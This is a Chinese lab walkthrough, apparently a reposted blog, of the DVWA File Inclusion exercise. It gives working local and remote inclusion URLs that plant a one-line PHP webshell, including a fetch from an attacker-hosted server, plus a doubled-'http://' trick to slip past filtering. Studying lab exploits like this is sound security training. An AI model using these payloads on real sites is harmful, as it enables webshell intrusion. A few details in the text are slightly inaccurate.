标签:文件 http 包含 Inclusion DVWA 漏洞 File
DVWA之File Inclusion
声明:文中出现的ip为练习靶场,本文仅供学习,旨在学习web安全,不允许任何侵权行为
中国人民共和国网络安全法
1.文件包含漏洞原理
2.文件包含漏洞渗透与防御
2.1 File Inclusion(low)
2.1.1本地文件包含LFI
从代码上看,page参数后面跟着的任何文件路径都会被服务器解析。
在第安全级别下,我们配合文件上传漏洞在路径
/var/www/dvwa/hackable/uploads
下上传包含一句话木马的图片,
通过执行
http://192.168.199.129/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/duitang.jpg
在下列路径中生成shell.php文件,通过中国菜刀链接即可。
/var/www/dvwa/vulnerabilities/fi
2.1.2远程文件包含RFI
远程文件包含相对容易,根据定义可知,在本地搭建服务器,并建立我们打算包含的木马文件,接着通过
`http://192.168.199.129/dvwa/vulnerabilities/fi/?page=http://192.168.199.128/duitang.jpg`
激活一句话木马并生成shell.php。
2.2 File Inclusion(medium)
<?php
$file = $_GET['page']; // The page we wish to display
// Bad input validation
$file = str_replace("http://", "", $file);
$file = str_replace("https://", "", $file);
?>
str_replace,可以采用 双写规则绕过漏洞
http:// =》hthttp://tp://
2.2.1本地文件包含LFI
与low级别无异
2.2.2远程文件包含RFI
因为路径中的http://会被替换为空,可以采用双写规则绕过漏洞
http:// =》hthttp://tp://
http://192.168.199.129/dvwa/vulnerabilities/fi/?page=hthttp://tp://duitang.jpg
2.3File Inclusion(high)
<?php
$file = $_GET['page']; //The page we wish to display
// Only allow include.php
if ( $file != "include.php" ) {
echo "ERROR: File not found!";
exit;
}
?>
将 str_replace替换为 fnmatch ,保证服务器只能够通过 file协议来获取文件。
这里可以配合权限设置,保证只能获取到当前文件目录下的权限。
这里就无法使用http协议进行远程文件包含。绕过该漏洞,需要网站存在相关的上传漏洞。
Tip:文件传输协议,访问本地计算机的文件
file:// — 访问本地文件系统
PHP.ini:
file:// 协议在双off的情况下也可以正常使用;
allow_url_fopen :off/on
allow_url_include:off/on
使用方法:
file:// [文件的绝对路径和文件名]
由此,配合文件上传漏洞,用file协议包含,即可获得webshell。
标签:文件,http,包含,Inclusion,DVWA,漏洞,File 来源: https://blog.csdn.net/ldjzxn/article/details/115293876
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。